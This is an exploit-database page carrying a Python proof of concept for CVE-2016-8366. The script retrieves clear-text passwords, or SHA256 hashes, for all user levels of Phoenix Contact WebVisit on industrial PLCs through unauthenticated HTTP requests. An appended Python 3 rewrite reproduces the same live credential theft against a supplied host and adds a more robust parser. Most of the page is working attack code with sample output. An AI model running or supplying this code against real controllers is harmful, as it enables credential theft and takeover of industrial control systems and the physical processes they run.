Phoenix Contact WebVisit 6.40.00 - Password Disclosure
Source: vfocus.net  Author: Photubias  Published: 2018-10-12
# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure
# Exploit Author: Deneut Tijl
# Date: 2018-09-30
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit < 6.40.00
# CVE: CVE-2016-8366
 
# This script retrieves the clear-text credentials of a password-protected WebVisit application running on a
# Phoenix Contact PLC. It was tested on a Phoenix Contact ILC-390 PLC, but other PLCs running WebVisit are
# surely equally vulnerable. With WebVisit 6.40.00 the passwords are stored as SHA256 hashes instead, which
# the script retrieves as well. Both requests it makes are plain, unauthenticated HTTP GETs.
        
# Sample output:
# C:\Users\admin\Desktop>CVE-2016-8366.py
# Please enter an IP [192.168.1.200]:
# This is the password for userlevel 1: pw1
# This is the password for userlevel 2: SuperPass2
# This is the password for userlevel 3: Extreme2TheMax3
# This is the password for userlevel 4: PowerPass4
# Press Enter to exit
 
# PoC
 
#! /usr/bin/env python2
# Python 2 script (urllib2, raw_input)

import sys
import urllib2, binascii

strIP = raw_input('Please enter an IP [192.168.1.200]: ')
if strIP == '': strIP = '192.168.1.200'

## Step 1: the start page names the main TEQ (WebVisit project) file in a 'MainTEQName' input element
try:
    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.URLError: ## URLError covers HTTPError as well as connection failures (no host, refused, timeout)
    print('#### Critical Error with IP ' + strIP + ': no response')
    raw_input('Press Enter to exit')
    sys.exit()

strMainTEQ = ''
for line in URLResponse.readlines():
    if 'MainTEQName' in line:
        strMainTEQ = line.split('VALUE="')[1].split('"')[0]

if strMainTEQ == '':
    print('#### Error, no \'MainTEQ\' found on the main page')
    raw_input('Press Enter to exit')
    sys.exit()

## Step 2: the TEQ file is served without authentication and embeds the password of every userlevel
try:
    LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))
except urllib2.URLError:
    print('Critical Error with IP ' + strIP + ': File \'' + strMainTEQ + '\' not found')
    raw_input('Press Enter to exit')
    sys.exit()
strAlldata = ''
for line in LoginTeqResponse.readlines():
    strAlldata += binascii.hexlify(line) ## whole file as one hex string

## Record layout inside the TEQ file (as hex):
## For vulnerable WebVisit (< 6.40.00), clear-text password:
##   'userLevel' + '0506030001' + level ('31' = ASCII '1') + '00030003010301068300' + passlength + password
## For WebVisit 6.40.00 and later, SHA256 hash stored as 64 ASCII hex characters (length byte '40' = 64):
##   'userLevel' + '0506030001' + level + '0003000301030b06830040' + hash

arrData = strAlldata.split('757365724c6576656c0506030001') ## 'userLevel' + '0506030001'
for item in arrData:
    if '00030003010301068300' in item:
        intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## First byte is the level as an ASCII digit: '31' -> '1' -> 1
        strPassLength = item.split('00030003010301068300')[1][:2] ## One length byte, then the password itself
        strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])
        print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)
    elif '0003000301030b06830040' in item:
        intUserlevel = int(binascii.unhexlify(item[:2]), 16)
        strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2]) ## 64 hex characters = 32-byte SHA256
        print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())
raw_input('Press Enter to exit')
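The record layout the PoC matches can also be parsed byte-aligned, which avoids the one weakness of searching a hex dump as a string: a marker can match on an odd nibble boundary, i.e. straddling two bytes. The Python 3 script below is an added example written for this page, not part of the original exploit. It builds a constructed TEQ fragment containing the two record kinds the PoC recognises (clear-text password and SHA256 hex digest) plus a decoy that shares the 'userLevel' head, and extracts the userlevel credentials from it. Assumptions: treating the byte after '000300030103' as the discriminator (0x01 clear text, 0x0b hash) is inferred from the PoC's two markers; the 64-character hash in the sample is a placeholder, not a digest of any password; fetch_teq reproduces the PoC's two unauthenticated GETs and its MainTEQName regex mirrors the PoC's line scrape (attribute order is assumed); the default host 192.168.1.200 is the PoC's.

```python
#!/usr/bin/env python3
"""Byte-aligned parser for the WebVisit TEQ credential records matched by the PoC above (added example)."""
import re
import sys
import urllib.request

# Record layout as matched by the PoC (its hex markers, here as bytes):
#   b'userLevel' 05 06 03 00 01 <level: ASCII digit>
#   00 03 00 03 01 03 <type> 06 83 00 <len> <value>
# type 0x01: clear-text password, <len> = password length      (WebVisit < 6.40.00)
# type 0x0b: SHA256 as 64 ASCII hex characters, <len> = 0x40   (WebVisit 6.40.00 and later)
# Using <type> as the discriminator is inferred from the PoC's two markers (assumption).
RECORD_HEAD = b"userLevel\x05\x06\x03\x00\x01"
VALUE_HEAD = b"\x00\x03\x00\x03\x01\x03"
VALUE_TAIL = b"\x06\x83\x00"
TYPE_PLAINTEXT = 0x01
TYPE_SHA256 = 0x0B
HEADER_LEN = 1 + len(VALUE_HEAD) + 1 + len(VALUE_TAIL) + 1  # level, head, type, tail, len


def extract_credentials(teq):
    """Return [(userlevel, kind, value), ...] for every credential record in a TEQ file.

    kind is 'password' for clear text or 'sha256' for the hex digest. Occurrences of the
    head whose header does not fit the layout, and values running past the end of the
    file, are skipped instead of raising.
    """
    found = []
    pos = teq.find(RECORD_HEAD)
    while pos >= 0:
        p = pos + len(RECORD_HEAD)
        hdr = teq[p:p + HEADER_LEN]
        if (len(hdr) == HEADER_LEN and hdr[:1].isdigit()
                and hdr[1:7] == VALUE_HEAD and hdr[8:11] == VALUE_TAIL):
            level, kind, length = int(hdr[:1].decode()), hdr[7], hdr[11]
            value = teq[p + HEADER_LEN:p + HEADER_LEN + length]
            if len(value) == length:
                if kind == TYPE_PLAINTEXT:
                    found.append((level, "password", value.decode("latin-1")))
                elif kind == TYPE_SHA256:
                    found.append((level, "sha256", value.decode("ascii").lower()))
        pos = teq.find(RECORD_HEAD, p)
    return found


def build_record(level, kind, value):
    """Build one credential record in the layout above (used only for the constructed sample)."""
    return (RECORD_HEAD + str(level).encode() + VALUE_HEAD + bytes([kind])
            + VALUE_TAIL + bytes([len(value)]) + value)


# Constructed TEQ fragment: two clear-text records, a decoy with the same head, and one hash
# record. The hash is a placeholder of 64 hex characters, not a digest of any password.
SAMPLE_TEQ = (b"\x00\x01filler\x00"
              + build_record(1, TYPE_PLAINTEXT, b"pw1")
              + b"userLevel\x05\x06\x03\x00\x01X\x00\x00"  # same head, not a credential record
              + build_record(2, TYPE_PLAINTEXT, b"SuperPass2")
              + build_record(3, TYPE_SHA256, b"0123456789ABCDEF" * 4)
              + b"\x00trailer")


def fetch_teq(host, timeout=5):
    """Reproduce the PoC's two unauthenticated GETs: read MainTEQName from the start page,
    then download that file. The attribute order in the regex mirrors the PoC's scrape (assumption)."""
    with urllib.request.urlopen("http://%s/" % host, timeout=timeout) as resp:
        index = resp.read().decode("latin-1")
    m = re.search(r'MainTEQName[^>]*VALUE="([^"]+)"', index)
    if not m:
        raise ValueError("no MainTEQName on the start page of %s" % host)
    with urllib.request.urlopen("http://%s/%s" % (host, m.group(1)), timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    # Offline:       python3 teq_creds.py               (parses the constructed sample)
    # Against a PLC: python3 teq_creds.py 192.168.1.200
    data = fetch_teq(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_TEQ
    for level, kind, value in extract_credentials(data):
        print("userlevel %d %s: %s" % (level, kind, value))
```

Run without arguments it parses the constructed sample and prints the three credentials; with a host argument it performs the same two requests as the PoC. Because the parser checks the full header and the length byte before slicing, a truncated file or a stray 'userLevel' string yields no output rather than an exception.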
 